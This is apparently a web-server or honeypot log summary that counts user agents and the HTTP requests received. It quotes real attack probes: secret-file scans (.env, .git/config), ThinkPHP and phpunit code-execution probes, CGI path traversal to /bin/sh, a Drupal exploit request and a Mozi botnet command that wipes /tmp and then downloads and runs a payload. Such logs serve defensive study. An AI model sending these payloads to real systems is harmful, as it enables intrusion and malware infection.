1 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36 |
26 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 |
3 | Mozilla/5.0 zgrab/0.x |
1 | Python/3.7 aiohttp/3.7.4.post0 |
1 | Wget/1.12 (linux-gnu) |
1 | python-requests/2.18.4 |
2 | python-requests/2.21.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | HELP |
||
3 | \x03 |
||
2 | \x16\x03\x01\x01D\x01 |
||
3 | \x16\x03\x01 |
||
1 | GET | /.DS_Store |
HTTP/1.1 |
30 | GET | /.env |
HTTP/1.1 |
3 | GET | /.git/config |
HTTP/1.1 |
1 | GET | //MyAdmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //myadmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //phpMyAdmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //phpmyadmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //pma/scripts/setup.php |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /?rest_route=/wp/v2/users/ |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp |
HTTP/1.0 |
1 | GET | /c/version.js |
HTTP/1.1 |
1 | GET | /ccmadmin/showHome.do |
HTTP/1.1 |
1 | GET | /config.json |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /fuN3 |
HTTP/1.0 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /info.php |
HTTP/1.1 |
1 | GET | /login.action |
HTTP/1.1 |
1 | GET | /muieblackcat |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /s/31332e36372e34342e323334/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties |
HTTP/1.1 |
1 | GET | /server-status |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /solr/ |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /telescope/requests |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | GET | /video/26176.html |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
2 | HEAD | / |
HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |